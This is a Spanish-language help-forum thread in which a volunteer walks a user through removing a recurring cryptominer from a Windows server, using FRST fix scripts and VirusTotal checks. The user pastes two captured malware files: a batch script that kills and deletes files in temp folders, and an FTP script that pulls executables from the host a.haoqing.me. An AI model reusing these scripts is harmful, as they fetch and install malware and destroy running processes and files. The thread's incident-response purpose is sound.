2019-11-13 16:37 - 2019-12-01 14:50 - 000003258 _____ C:\Windows\system32\Tasks\EOSv3 Scheduler onTime
2019-11-12 17:27 - 2019-11-12 17:27 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Panda Security
2019-11-12 17:27 - 2019-11-12 17:27 - 000000000 ____D C:\Program Files (x86)\Panda Security
2019-11-12 17:27 - 2015-01-29 18:21 - 000050320 _____ (Panda Security, S.L.) C:\Windows\system32\Drivers\PSKMAD.sys
2019-11-12 17:26 - 2019-11-12 17:26 - 038191600 _____ (Panda Security ) C:\Users\Administrador\Downloads\PandaCloudCleaner.exe
2019-11-12 13:13 - 2019-11-12 13:13 - 008166712 _____ (ESET spol. s r.o.) C:\esetonlinescanner_esl.exe
2019-11-12 13:13 - 2019-11-12 13:13 - 000000000 ____D C:\Users\Administrador\AppData\Local\ESET
2019-11-18 14:03 - 2015-09-28 14:28 - 000000000 ____D C:\Program Files (x86)\Fortinet
2019-11-16 13:58 - 2014-10-02 17:04 - 000000000 ____D C:\Program Files (x86)\Trend Micro
2019-11-12 15:20 - 2014-10-02 17:23 - 000000000 ____D C:\temp
FirewallRules: [SCW-Allow-Inbound-Access-To-ScsHost-TCP-RPC-EndPointMapper] => (Allow) %systemroot%\system32\scshost.exe No File
FirewallRules: [SCW-Allow-Inbound-Access-To-ScsHost-TCP-RPC] => (Allow) %systemroot%\system32\scshost.exe No File

CMD: ipconfig /flushdns
CMD: ipconfig /renew
CMD: bitsadmin /reset /allusers
CMD: netsh winsock reset
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state ON
CMD: netsh int ipv4 reset
CMD: netsh int ipv6 reset
RemoveProxy:
EmptyTemp:
Hosts:
END

• Lo guardas bajo el nombre de fixlist.txt en el escritorio <<< Esto es muy importante.

Nota: Es necesario que el ejecutable Frst.exe y fixlist.txt se encuentren en la misma ubicación (escritorio) o si no la herramienta no trabajara.

• Ejecutas Frst.exe.
• Presionas el botón Fix y aguardas a que termine.
• La Herramienta guardara el reporte en tu escritorio (Fixlog.txt).
• Lo pegas en tu próxima respuesta.

Pd: Actualiza Java a su ultima versión que lo tienes desactualizado.

Y desinstala de tu navegador Google Chrome la extensión (Chrome Media Router)

Nos comentas .

Salu2.

Hola @SanMar, gracias por tu tiempo. Voy a hacer las limpiezas que me dijiste e informare. La desinstalacion de Symantec fallo y estaba justamente tratando de limpiar eso. Seguire los pasos que me dijiste y comentare que ocurrio. Gracias.

Hola @elotrohernan

Perfecto por aquí te esperamos.

Según su pagina métodos de desisntalación:

https://support.symantec.com/es/es/article.HOWTO80803.html

Nos comentas.

Salu2

@SanMar mira el virus se ejecuto como hace cada 48hs y algunos archivos no fueron eliminados por el AV, se copian en la carpeta publica. Este server lo estoy trabajando por remoto, no fisicamente en el lugar. Fueron 3 archivos, pude ver el contenido de dos, te lo copio aca: a.bat y ftp.txt, el tercer archivo llamado run.exe solo lo elimine. Microsoft Security no emite ninguna alerta asi que lo voy a desitslar, y posiblemente vuelta a instalar Symantec, en conjunto con Inmunet. Estoy un poco cansado, voy a ver bien lo que me pusiste y tratare de hacer la limpieza que me dijiste

image1093×814 105 KB

C:\Users\Public\Videos\a.bat

@echo off
setlocal enabledelayedexpansion
cd /d %~dp0
for /f "delims=" %%i in ('dir C:\Users\MSSQLSERVER\AppData\Local\Temp\ /b/a-d/od') do (
taskkill /f /im %%i &del C:\Users\MSSQLSERVER\AppData\Local\Temp\%%i /q
)
ping -n 2 localhost 1>nul 2>nul
for /f "delims=" %%i in ('dir C:\ProgramData\ /b/a-d/od') do (
taskkill /f /im %%i &del C:\ProgramData\%%i /q
)
ping -n 2 localhost 1>nul 2>nul
for /f "delims=" %%i in ('dir C:\ProgramData\TEMP\ /b/a-d/od') do (
taskkill /f /im %%i &del C:\ProgramData\TEMP\%%i /q
)

C:\Users\Public\Videos\ftp.txt

open a.haoqing.me 
admin
admin
bin 
get sqlservrs.exe C:\Users\Public\Videos\sqlservrs.exe 
get rundll32.exe C:\Users\Public\Videos\rundll32.exe 
get run.exe C:\Users\Public\Videos\run.exe 
get Temp.exe C:\Users\Public\Videos\Temp.exe 
get Temp.exe C:\Users\Public\Videos\JP.exe 
get a.bat C:\Users\Public\Videos\a.bat 
bye

Hola @elotrohernan

Entiendo que estés cansado, pero debo advertirte que los pasos que haces instalando y recontra-instalando AV no ayudan para nada, solo complican el panorama, dejan muchos restos activos en el equipo y van a producir en cualquier momento un gran bloqueo.

Es evidente que las herramientas tradicionales no lo ven, ni hablar de los AV que no lo detienen, por lo cual tienes que ir a **una caza casi manual **, pero primero tenemos que detectar contra que estas luchando.

Todo esto para poder armar un plan ordenado por que si no sera imposible de eliminar, y al ser un Server menos.

Por ello, y ademas de los pasos que te deje en el post ya que se nota que tienes conocimientos y reconoces a los archivos maliciosos, cuando los identifiques en la carpeta publica subelos a cada uno de ellos a Virus Total para ver contra que estamos luchando, conociendo al enemigo tal vez podamos darle batalla.

Lo que yo haría:

• No instales mas AV, no pueden con el por el momento.

• Realiza los pasos que te deje anteriormente.

• Cuando se vuelvan a crear estos archivos maliciosos, primero los subes a Virus Total: a cada uno de ellos siguiendo la ruta.

• C:\Users\Public\Videos\sqlservrs.exe

• C:\Users\Public\Videos\rundll32.exe

• C:\Users\Public\Videos\run.exe

• C:\Users\Public\Videos\Temp.exe

• C:\Users\Public\Videos\JP.exe

• C:\Users\Public\Videos\a.bat

VirusTotal te dará un resultado copias los enlace y lo traes a tu próxima respuesta.

Ademas analiza con el Administrador de Tareas o Process Explorer o el programa que utilices para analizar procesos, cada uno de ellos y la información que puedas recopilar de los mismos.

Entiendo que es un Server, pero en algún momento ese equipo puede ser desconectado de Internet?

Es el equipo de una empresa?

Salu2

Hola @SanMar nuevamente gracias por tu tiempo. Temporalmente la computadora quedo solo andando con Inmunet e hice todas las limpiezas de Symantec etc. Restaure de la cuarentena algunos de los archivos en cuestión e hice los análisis con la pagina de Virus Total. Solo los .exe alertan virus.

• C:\Users\Public\Videos\sqlservrs.exe alerta virus.

• C:\Users\Public\Videos\d.exe alerta virus

Los demas no alertan virus: a.bat ; ftp.txt ; dll.vbe

• C:\Users\Public\Videos\a.bat no detecta nada

Del mismo modo dll.vbe y ftp.txt

No veia muy necesario poner los link de esos tambien. Los otros archivos .exe no los tengo en la cuarentena de Inmunet.

sqlservrs.exe esta hasta las manos parece.

Ejecute el FIX de Frst.exe y me causo algunas cosas que imagine podían ocurrir, como error en los puertos de SQL del sistema etc, pero ya lo resolví. Te dejo la salida de Fixlog.txt y de verdad muchas gracias por tu tiempo.

Me da la sensación que Symantec es mas rápido que Inmunet en la detección, pero como no es una versión, digamos oficial tu sabes, no confió en dejarlo como único antivirus andando, por eso lo usaba en combinación con Inmunet, que según la pagina puede trabajar con otros AV. No me habían dado problemas. Funciono así durante dos semanas luego de la infección.

En medio del proceso desinstale Symantec e instale Microsoft Secuity para ver que resultados obtenía, pero deja mucho que desear, no detectó absolutamente nunca nada.

No se si los usuarios tienen experiencias con Inmunet o Fortinet, o algún AV gratuito para Server. Te dejo la salida de Fixlog.txt Supongo que la experiencia servirá. Mi temor es que sea un encriptador. Por eso no quiero dejar sin defensas el server. También agregue la pagina a.haoqing.me al archivo de hosts (127.0.0.1)

No me animo a hacerlo en una maquina virtual, pero voy a ejecutar esos .exe en una instalación limpia de Seven y ver que ocurre, desconectando mi PC de la red.

Saludos.

Fixlog.txt (18,7 KB)

Bueno, ejecute el virus en una instalación de Windows Seven x64 en mi taller, desconectando los demás equipos de la red. La verdad que me paranoiquie un poco, al punto que al finalizar el experimento, apague el router un rato para que tome nueva IP.

• d.exe no hizo nada, arrojo error de ejecución se cierra el programa.

• sqlserver.exe es la captura que pongo a continuación

En el administrador de tareas no pude ver mucho, solo que se consumía el 99% del proceso y enlentencía mucho la PC Con solo cerrar la ventana finalizo el proceso, al activar el av Inmunet, lo volví a ejecutar. d.exe lo elimino rápido, pero sqlserver.exe se llego a ejecutar y abrió la ventana durante un segundo con el av activado.

virus670×720 24.3 KB

@SanMar como me asuste un poco en el server deje andando en simultaneo Inmunet, y Symantec.

Por lo pronto están andando correctamente. Vos crees que esto pueda ser contraproducente ?

Si el virus se vuelve a activar, yo creo que ya va siendo una opción formatear el server. No se que opinas.

Hola @elotrohernan

Es un Minero.

Resetea algunas configuraciones por ello los errores,

De hecho en Virustotal es uno de los que lo detecta a ambos.

Es que por aquí la mayoría son usuarios normales, con versiones de Windows de uso hogareño.

Tiene un componente minero (Trojan.BitCoinMiner.Generic)

No por el momento deja esos dos.

Lamentablemente al ser un Server donde no todas las herramientas funcionan correctamente, y ademas un troyano que no esta ejecutándose constantemente sino cada 48 hs creo que lo mejor será formatear, ya que la Herramienta mas poderosa como FRST no lo ve.

Aunque no me gusta decirlo creo que es la mejor recomendación, eso si cuando lo hagas instalale todas las actualizaciones de seguridad correspondientes para que no queden agujeros que aproveche el Malware.

Ademas aunque te ha funcionado bien, no es recomendable el uso de AV con medicinas ya que como tu mismo has descripto da dudas de que actúen correctamente.

Una vez que formatees, si puedes pagar una licencia te recomiendo Malwarebytes Endpoint Security

Salu2

@SanMar disculpa las molestias, te muestro una ultima novedad y me decis que opinas.

Como los archivos infectados siempre se copian en la carpeta publica de Videos, a dicha carpeta en la pestaña de Seguridad le quite todos los permisos de Escritura, Lectura, Ejecucion, etc, la carpeta se volvió inaccesible para el mismo sistema o administrador.

Esto es temporal hasta que me pueda llevar el server para formatear. Pero hubo una detección en la carpeta webcache que antes no habia aparecido nunca.

Aun no estoy seguro si esta carpeta tiene que ver con Internet Explorer y si se puede borrar por completo. Cuando fui a buscar el archivo porque Inmunet informa que la cuarentena fallo, no estaba. Symantec no lo detecto ni alertó.

Dejo caputras de a deteccion, y de que el virus no lo pude hallar. Si tiene que ver con IE pensaba desinstalarlo. Gracias.

virus carpeta696×254 54.9 KB

Hola @elotrohernan

Bien, esperemos que pasa cuando se cumplan las 48 hs a ver si el virus cambia de ubicación.

Sobre Webcache, activa Ver los archivos Ocultos, y revisa si así si puedes ver el archivo.

Salu2

Hola @SanMar, no se si podríamos dar el tema por “Solucionado” pero el virus no volvió a alertar mas. Luego de bloquear la carpeta de videos (en seguridad denegué escritura y lectura para todos los usuarios y el sistema, solo la logro desbloquear con la aplicación Ntfs Access, lo he echo para verificar que no haya nada dentro de ella), prosigo, luego de restringir el acceso a esa carpeta tuve una alerta en webcache, y decidi desinstalar/desactivar IE, también desinstale y volvì a instalar Chrome. Leí por allí que pese a su problema con la privacidad del usuario, es el navegador mas seguro contra virus y malwares. Si vos sabes de otro navegador que sea mas seguro agradezco la información.

No tuve mas alertas. Igualmente en un tiempo, cuando la oficina pare un poco, voy a formatear el server y poner un Windows Server mas nuevo. Inmunet y Syamntec parecen andar bien juntos, puse en excepciones sus carpetas para que no se detecten entre ellos (a veces syamntec se iba a buscar virus a la carpeta temporal de de Inmunet y entraban como en un ciclo de borro no borro.

Solo noto que cuando activo el ClamAV de Inmunet se me consume mucha memoria RAM (700/800mb), y lei que puede tener que ver con ClamAV y el SQL. O algo de la nube del sistema que hace bacup.

Agradezco tu tiempo, besos.

Hola @elotrohernan

En realidad todos los navegadores tienen sus problemas con las infecciones vía script, pero mas seguro que IE es.

Es recomendable utilizar una extensión como Malwarebytes Browser Guard

Yo prefiero Opera, al cual también se le puede instalar la extensión que te comente pero con un paso previo que es colocar Install Chrome Extensions, que es para poder instalar todas las extensiones de Google Chrome en Opera.

Aunque por aquí muchos prefieren Firefox.

Es lo ideal, y si lo haces con licencia original, para descargar todas las actualizaciones de seguridad seria lo mejor, y así evitar este tipo de ataques/infecciones que generalmente se dan por agujeros de seguridad como los de EternalBlue o Emotet por ejemplo.

Perfecto, aunque al ser una empresa deberían pagar una licencia y asegurarse que tienen la mejor protección y evitar verdaderos dolores de cabeza, como ya te comente como por ejemplo el Endpoint de Malwarebytes.

Es muy pesado y se tragará todos los recursos.

Si podemos, y si tienes algún nuevo incidente, puedes mandarme un MP y reabrimos el tema.

Para otros problemas, ya sabes donde encontrarnos.

Salu2.